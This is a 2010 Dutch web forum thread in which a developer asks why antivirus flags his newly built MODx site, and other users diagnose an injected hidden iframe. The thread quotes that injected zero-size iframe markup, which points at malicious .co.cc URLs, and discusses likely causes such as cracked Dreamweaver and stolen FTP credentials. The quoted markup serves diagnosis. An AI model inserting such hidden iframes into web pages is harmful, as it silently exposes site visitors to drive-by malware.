Toon posts:

Site geeft trojan en exploit waarschuwing

Pagina: 1
Acties:

maandag 25 oktober 2010 23:09

Acties:
  • 0 Henk 'm!
  • DNA_Saint
  • Registratie: Maart 2004
  • Laatst online: 19:29

DNA_Saint

Go Go Gadget Ondertitel!

Topicstarter
Heb net gisteren mijn site afgemaakt. Maar nu liet ik het vrienden zien en die vertellen dat wanneer ze de 1e keer naar de site gaan, AVG op hol springt.

Ze krijgen dat bestandsnaam: proprotocol.co.cc/get/js.php een Exploit Javascript Obfuscation is.
En daarnaast nog een melding van trojans.

Ik heb echt werkelijk geen idee hoe dit kan. Als ik mijn ftp scan op dit bestand, bestaat ie ook niet.

De screenshots hieronder laten de fouten zien:
Afbeeldingslocatie: http://tweakers.net/ext/f/e094zsuzzNAzcIe8jPz1ZJEP/full.jpg
Afbeeldingslocatie: http://tweakers.net/ext/f/GBmbtwaRsLoZePAZEvUeGfzX/full.jpg

Ik heb gegoogled op de url die in de waarschuwing staat. Maar krijg geen resultaten.

Huub Huub Barbatruc!

maandag 25 oktober 2010 23:13

Acties:
  • 0 Henk 'm!
  • RaZ
  • Registratie: November 2000
  • Niet online

RaZ

Funky Cold Medina

Ik zie anders dit in je source staan:
HTML:
1

<div class="clear"><iframe src="http://proprotocol.co.cc/wiki/index.php?topic=170&action=cleaner&up=post&c=post" width="0" height="0" frameborder="0"></iframe>&nbsp;</div>

Die lijkt me daar niet thuis te horen.

Ey!! Macarena \o/

maandag 25 oktober 2010 23:15

Acties:
  • 0 Henk 'm!
  • DNA_Saint
  • Registratie: Maart 2004
  • Laatst online: 19:29

DNA_Saint

Go Go Gadget Ondertitel!

Topicstarter
waar dan?

Huub Huub Barbatruc!

maandag 25 oktober 2010 23:16

Acties:
  • 0 Henk 'm!
  • pickboy
  • Registratie: Februari 2006
  • Laatst online: 19:56

pickboy

@Raz, je was me voor

Edit, regel 77 bij mij

[ Voor 39% gewijzigd door pickboy op 25-10-2010 23:16 ]

maandag 25 oktober 2010 23:16

Acties:
  • 0 Henk 'm!
  • DNA_Saint
  • Registratie: Maart 2004
  • Laatst online: 19:29

DNA_Saint

Go Go Gadget Ondertitel!

Topicstarter
Ik zie het niet staan. En ververs eens en ga er opnieuw naar toe. Zie je het dan nog steeds staan?

Want vrienden van mij krijgen pas weer melding na rebooten. Anders krijgen ze het niet meer.

Huub Huub Barbatruc!

maandag 25 oktober 2010 23:18

Acties:
  • 0 Henk 'm!
  • pickboy
  • Registratie: Februari 2006
  • Laatst online: 19:56

pickboy

refreshed en het betreffend i-frame is weg

maandag 25 oktober 2010 23:23

Acties:
  • 0 Henk 'm!
  • Lizard
  • Registratie: Februari 2000
  • Laatst online: 13:36

Lizard

Ik zie dezelfde regel ook in de source staan.

HTML:
77
78
79
80
81
82
83

<div class="clear"><iframe src="http://proprotocol.co.cc/get/?nav=cleaner&xml=0&php=3&n=170&past=4" width="0" height="0" frameborder="0"></iframe>&nbsp;</div>
<div class="colContain">
<div id="setheight" class="column floatLeft">
<h2>Welkom!</h2>
<p>Welkom bij Tiger Media! Wij zijn een jong, maar zeer ervaren ontwerpbureau gevestigd in Rotterdam. Sinds 2008 verzorgen wij websites en gerelateerde producten en diensten van idee tot eindproduct. Deze zijn van topkwaliteit en voor een betaalbare prijs, zodat u zich nergens zorgen over hoeft te maken.</p>
<p>Wij stellen veel waarde aan uw wensen en idee&euml;n, in combinatie met onze creativiteit zorgen wij ervoor dat we samen tot een succesvol eindproduct komen.</p>
</div>

maandag 25 oktober 2010 23:24

Acties:
  • 0 Henk 'm!
  • DNA_Saint
  • Registratie: Maart 2004
  • Laatst online: 19:29

DNA_Saint

Go Go Gadget Ondertitel!

Topicstarter
ik snap echt niet waar die vandaan komt. En ook waarom het na refreshen weer weg is.

Ik gebruik MODx CMS. En in de manager heb ik echt niks raars staan.

Huub Huub Barbatruc!

maandag 25 oktober 2010 23:25

Acties:
  • 0 Henk 'm!
  • Lizard
  • Registratie: Februari 2000
  • Laatst online: 13:36

Lizard

Na een refresh is die iframe ook hier weg.

maandag 25 oktober 2010 23:25

Acties:
  • 0 Henk 'm!
  • RaZ
  • Registratie: November 2000
  • Niet online

RaZ

Funky Cold Medina

En hoe up 2 date is dat CMS ?

Ey!! Macarena \o/

maandag 25 oktober 2010 23:25

Acties:
  • 0 Henk 'm!
  • Saven
  • Registratie: December 2006
  • Laatst online: 11:09

Saven

Administrator

virus op je pc denk ik. die add waarschijnlijk in elke html of php file ofzo dat regeltje
heb dat wel eens vaker gezien

[ Voor 19% gewijzigd door Saven op 25-10-2010 23:26 ]

maandag 25 oktober 2010 23:28

Acties:
  • 0 Henk 'm!
  • pickboy
  • Registratie: Februari 2006
  • Laatst online: 19:56

pickboy

het kwam in ieder geval op de plek van de eerste
HTML:
1

&nbsp;
te staan

maandag 25 oktober 2010 23:30

Acties:
  • 0 Henk 'm!
  • Erwin537
  • Registratie: December 2008
  • Laatst online: 16:44

Erwin537

Saven schreef op maandag 25 oktober 2010 @ 23:25:
virus op je pc denk ik. die add waarschijnlijk in elke html of php file ofzo dat regeltje
heb dat wel eens vaker gezien
Dat zou toch niet werken bij een CMS? Je upload tenslotte geen html files, maar een heel systeem.

Ik krijg overigens ook de melding.

maandag 25 oktober 2010 23:31

Acties:
  • 0 Henk 'm!
  • DNA_Saint
  • Registratie: Maart 2004
  • Laatst online: 19:29

DNA_Saint

Go Go Gadget Ondertitel!

Topicstarter
RaZ schreef op maandag 25 oktober 2010 @ 23:25:
En hoe up 2 date is dat CMS ?
Ik zie in tabje nieuws geen exploits oid staan die bekend zijn voor mijn versie.
Saven schreef op maandag 25 oktober 2010 @ 23:25:
virus op je pc denk ik. die add waarschijnlijk in elke html of php file ofzo dat regeltje
heb dat wel eens vaker gezien
Op mijn pc? Maar waarom zie ik dan niks in het cms staan?
Ergens moet toch de code hiervoor staan.

====
ik verwijder nu om te testen even die flash slider. Kijken of het daarmee te maken heeft.

[ Voor 8% gewijzigd door DNA_Saint op 25-10-2010 23:41 ]

Huub Huub Barbatruc!

maandag 25 oktober 2010 23:41

Acties:
  • 0 Henk 'm!
  • pickboy
  • Registratie: Februari 2006
  • Laatst online: 19:56

pickboy

Hoe zit het met je flash filmpje, die wil nu bij mij in ieder geval niet meer afspelen.

edit:
ow, nu weer wel, misschien ligt dat dan wel weer bij mij

[ Voor 29% gewijzigd door pickboy op 25-10-2010 23:42 ]

maandag 25 oktober 2010 23:43

Acties:
  • 0 Henk 'm!
  • DNA_Saint
  • Registratie: Maart 2004
  • Laatst online: 19:29

DNA_Saint

Go Go Gadget Ondertitel!

Topicstarter
Ik heb het nu verwijderd. Maar het vervelende is dat mensen na de 1e keer error niet meer krijgen.
Volgens een vriend krijgt hij pas weer error na een reboot.

Lijkt mij echt sterk dat het door de flash slider komt. Komt van cu3er en heb een licentie ervoor betaald. En vele sites gebruiken het.

Huub Huub Barbatruc!

maandag 25 oktober 2010 23:46

Acties:
  • 0 Henk 'm!
  • Polster
  • Registratie: Oktober 2004
  • Laatst online: 16:06

Polster

Kreeg het net (1 min geleden) nog op regel 71 en na een refresh niet meer.

[ Voor 12% gewijzigd door Polster op 25-10-2010 23:47 ]

maandag 25 oktober 2010 23:49

Acties:
  • 0 Henk 'm!
  • pickboy
  • Registratie: Februari 2006
  • Laatst online: 19:56

pickboy

nou vooruit, ik zal even rebooten, kijken of het bij mij ook terugkomt.

maandag 25 oktober 2010 23:50

Acties:
  • 0 Henk 'm!
  • Erwin537
  • Registratie: December 2008
  • Laatst online: 16:44

Erwin537

Ik heb net ook gereboot, maar er kwam niets terug.

Kijk eens welke snippets er allemaal geïnstalleerd zijn, staat daar niets vreemds tussen?

maandag 25 oktober 2010 23:51

Acties:
  • 0 Henk 'm!
  • DNA_Saint
  • Registratie: Maart 2004
  • Laatst online: 19:29

DNA_Saint

Go Go Gadget Ondertitel!

Topicstarter
Ok, komt dus niet door Flash slider. Want die had ik weggehaald.

Maar waardoor dan wel? MODx cms gebruik ik voor elke site die ik maak. Nooit problemen gehad. En nu maak ik mijn eigen site. En pats...

Ik heb naar mijn weten geen rare files op de server staan.

Huub Huub Barbatruc!

maandag 25 oktober 2010 23:53

Acties:
  • 0 Henk 'm!
  • pickboy
  • Registratie: Februari 2006
  • Laatst online: 19:56

pickboy

DNA_Saint schreef op maandag 25 oktober 2010 @ 23:51:
Ok, komt dus niet door Flash slider. Want die had ik weggehaald.

Maar waardoor dan wel? MODx cms gebruik ik voor elke site die ik maak. Nooit problemen gehad. En nu maak ik mijn eigen site. En pats...

Ik heb naar mijn weten geen rare files op de server staan.
Bij je maat kwam het wel terug na een reboot.

Nu heb je de flash-slider weggehaald en nu komt het niet meer terug na een reboot (ik heb zojuist ook een reboot gedaan en ik zie ook niks terugkomen), dus lijkt me dat het juist wel in de flash-slider zit. Althans, zo lijkt het tenminste.

maandag 25 oktober 2010 23:58

Acties:
  • 0 Henk 'm!
  • DNA_Saint
  • Registratie: Maart 2004
  • Laatst online: 19:29

DNA_Saint

Go Go Gadget Ondertitel!

Topicstarter
ik ga de flashfile dan even decompilen om te kijken of iets te vinden is.
Maar een swf kan gewoon html inserten? :S

Huub Huub Barbatruc!

dinsdag 26 oktober 2010 00:01

Acties:
  • 0 Henk 'm!
  • pickboy
  • Registratie: Februari 2006
  • Laatst online: 19:56

pickboy

DNA_Saint schreef op maandag 25 oktober 2010 @ 23:58:
ik ga de flashfile dan even decompilen om te kijken of iets te vinden is.
Maar een swf kan gewoon html inserten? :S
Niet dat ik weet, maar ik heb er dan ook weinig verstand van.

dinsdag 26 oktober 2010 00:04

Acties:
  • 0 Henk 'm!
  • DNA_Saint
  • Registratie: Maart 2004
  • Laatst online: 19:29

DNA_Saint

Go Go Gadget Ondertitel!

Topicstarter
net swf gedecompiled. Heb een search gedaan in alle AS code naar "iframe" of "proprotocol", heb niks gevonden.

Ook niet in js van de slider.

Huub Huub Barbatruc!

dinsdag 26 oktober 2010 00:15

Acties:
  • 0 Henk 'm!
  • pickboy
  • Registratie: Februari 2006
  • Laatst online: 19:56

pickboy

DNA_Saint schreef op dinsdag 26 oktober 2010 @ 00:04:
net swf gedecompiled. Heb een search gedaan in alle AS code naar "iframe" of "proprotocol", heb niks gevonden.

Ook niet in js van de slider.
hmm, nasty litle bugger.

Succes

dinsdag 26 oktober 2010 00:18

Acties:
  • 0 Henk 'm!
  • simon
  • Registratie: Maart 2002
  • Laatst online: 21:50

simon

En je hoster is 100% kosher?

|>

dinsdag 26 oktober 2010 00:23

Acties:
  • 0 Henk 'm!
  • DNA_Saint
  • Registratie: Maart 2004
  • Laatst online: 19:29

DNA_Saint

Go Go Gadget Ondertitel!

Topicstarter
heb hosting bij one.com dus lijkt mij wel. Als zij niet kosher zijn, dan vertrouw ik geen enkele hosting bedrijf meer.

Maar kan altijd vragen of iets van een bot ofzo bekend is bij hun.

[ Voor 22% gewijzigd door DNA_Saint op 26-10-2010 00:24 ]

Huub Huub Barbatruc!

dinsdag 26 oktober 2010 15:54

Acties:
  • 0 Henk 'm!
  • brtk
  • Registratie: November 2006
  • Laatst online: 15:21

brtk

misschien eens proberen om je FTP wachtwoord te veranderen en dan alles opnieuw te uploaden ?

dinsdag 26 oktober 2010 16:00

Acties:
  • 0 Henk 'm!
  • n0fragger
  • Registratie: Juli 2007
  • Laatst online: 08-06 13:16

n0fragger

Ik heb dit eerder gezien, dit komt vaker voor bij mensen die een illegale versie van Dreamweaver hebben gedownload. In deze versie wordt elke keer wanneer er een pagina via de FTP functionaliteit van Dreamweaver geupload wordt automatisch een iframe ingebouwd zoals deze boven te zien is.

Dit is bij dreamweaver, weet niet of dit ook bij andere software voorkomt.

dinsdag 26 oktober 2010 16:02

Acties:
  • 0 Henk 'm!
  • 8088
  • Registratie: December 2000
  • Niet online

8088

NaN

brtk schreef op dinsdag 26 oktober 2010 @ 15:54:
misschien eens proberen om je FTP wachtwoord te veranderen en dan alles opnieuw te uploaden ?
Maar eerst grondig scannen op keyloggers en dergelijke.

Do you seek to engage in or have you ever engaged in terrorist activities, espionage, sabotage, or genocide?

dinsdag 26 oktober 2010 16:09

Acties:
  • 0 Henk 'm!
  • DNA_Saint
  • Registratie: Maart 2004
  • Laatst online: 19:29

DNA_Saint

Go Go Gadget Ondertitel!

Topicstarter
n0fragger schreef op dinsdag 26 oktober 2010 @ 16:00:
Ik heb dit eerder gezien, dit komt vaker voor bij mensen die een illegale versie van Dreamweaver hebben gedownload. In deze versie wordt elke keer wanneer er een pagina via de FTP functionaliteit van Dreamweaver geupload wordt automatisch een iframe ingebouwd zoals deze boven te zien is.

Dit is bij dreamweaver, weet niet of dit ook bij andere software voorkomt.
Kan toch bijna niet waar zijn? Ik heb een CMS en gebruik DW alleen voor css.

[ Voor 6% gewijzigd door DNA_Saint op 26-10-2010 16:11 ]

Huub Huub Barbatruc!

dinsdag 26 oktober 2010 16:12

Acties:
  • 0 Henk 'm!
  • NMe
  • Registratie: Februari 2004
  • Laatst online: 01-06 18:50

NMe

Quia Ego Sic Dico.

DNA_Saint schreef op dinsdag 26 oktober 2010 @ 16:09:
[...]

Kan toch bijna niet waar zijn? Ik heb een CMS en gebruik DW alleen voor css.
Het zou zomaar kunnen bij gekraakte software. En wat heeft een CMS te maken met code-injectie tijdens het FTP-proces? Al had je duizend CMS'en, dan nog had je hetzelfde probleem...

[ Voor 21% gewijzigd door NMe op 26-10-2010 16:13 ]

'E's fighting in there!' he stuttered, grabbing the captain's arm.
'All by himself?' said the captain.
'No, with everyone!' shouted Nobby, hopping from one foot to the other.

dinsdag 26 oktober 2010 16:16

Acties:
  • 0 Henk 'm!
  • ThinkPad
  • Registratie: Juni 2005
  • Laatst online: 21:49

ThinkPad

Hier geen problemen met IE8, Chrome, en AVG

dinsdag 26 oktober 2010 16:22

Acties:
  • 0 Henk 'm!
  • DNA_Saint
  • Registratie: Maart 2004
  • Laatst online: 19:29

DNA_Saint

Go Go Gadget Ondertitel!

Topicstarter
NMe schreef op dinsdag 26 oktober 2010 @ 16:12:
[...]

Het zou zomaar kunnen bij gekraakte software. En wat heeft een CMS te maken met code-injectie tijdens het FTP-proces? Al had je duizend CMS'en, dan nog had je hetzelfde probleem...
Omdat alle content in de db staat. Maar sowieso, ik heb dit niet bij andere sites die ik maak. Alleen bij deze.

Ook maar even db gechecked. Daarin is ook niks te vinden.

Het rare is ook dat ik niks op internet hierover kan vinden.

[ Voor 6% gewijzigd door DNA_Saint op 26-10-2010 16:22 ]

Huub Huub Barbatruc!

dinsdag 26 oktober 2010 19:07

Acties:
  • 0 Henk 'm!
  • 8088
  • Registratie: December 2000
  • Niet online

8088

NaN

DNA_Saint schreef op dinsdag 26 oktober 2010 @ 16:22:
Omdat alle content in de db staat.
Wat heeft content in de db te maken met code-injectie tijdens het FTP-proces?

Do you seek to engage in or have you ever engaged in terrorist activities, espionage, sabotage, or genocide?

dinsdag 26 oktober 2010 21:17

Acties:
  • 0 Henk 'm!
  • NMe
  • Registratie: Februari 2004
  • Laatst online: 01-06 18:50

NMe

Quia Ego Sic Dico.

8088 schreef op dinsdag 26 oktober 2010 @ 19:07:
[...]

Wat heeft content in de db te maken met code-injectie tijdens het FTP-proces?
Precies...het is niet alsof je code in je DB staat.

Overstappen op legale software lijkt me een goeie eerste stap...

'E's fighting in there!' he stuttered, grabbing the captain's arm.
'All by himself?' said the captain.
'No, with everyone!' shouted Nobby, hopping from one foot to the other.

woensdag 27 oktober 2010 04:49

Acties:
  • 0 Henk 'm!
  • alwinuzz
  • Registratie: April 2008
  • Laatst online: 22:16

alwinuzz

Het hoeft niet eens een illegale dreamweaver te zijn. Er zijn ook virussen die het opgeslagen FTP username/wachtwoord van bijvoorbeeld FileZilla of SmartFTP terugzoeken op je PC. Dan heb je weken later ineens een geinfecteerde website.

Dit lijkt me een puik plan (en dan niet je wachtwoord op laten slaan door je FTP programma):
brtk schreef op dinsdag 26 oktober 2010 @ 15:54:
misschien eens proberen om je FTP wachtwoord te veranderen en dan alles opnieuw te uploaden ?

woensdag 27 oktober 2010 05:48

Acties:
  • 0 Henk 'm!
  • mrFoce
  • Registratie: Augustus 2004
  • Laatst online: 05-06 17:59

mrFoce

Dit zit er nu in je website
code:
1

"http://dnsspot.co.cc/news/index.php?refresh=rect&cat=170&o=on&mode=cleaner&ajax=0


btw, Google?
Heb bv http://modxcms.com/forums/index.php?topic=52543.0 gevonden na 1 min Googlen =)
Pagina: 1
Reageer

Apple iPhone 16e LG OLED evo G5 Google Pixel 10 Samsung Galaxy S25 Star Wars: Outlaws Nintendo Switch 2 Apple AirPods Pro (2e generatie) Sony PlayStation 5 Pro

Tweakers is onderdeel van DPG Media B.V.
Alle rechten voorbehouden - Auteursrecht © 1998 - 2025 Hosting door TrueFullstaq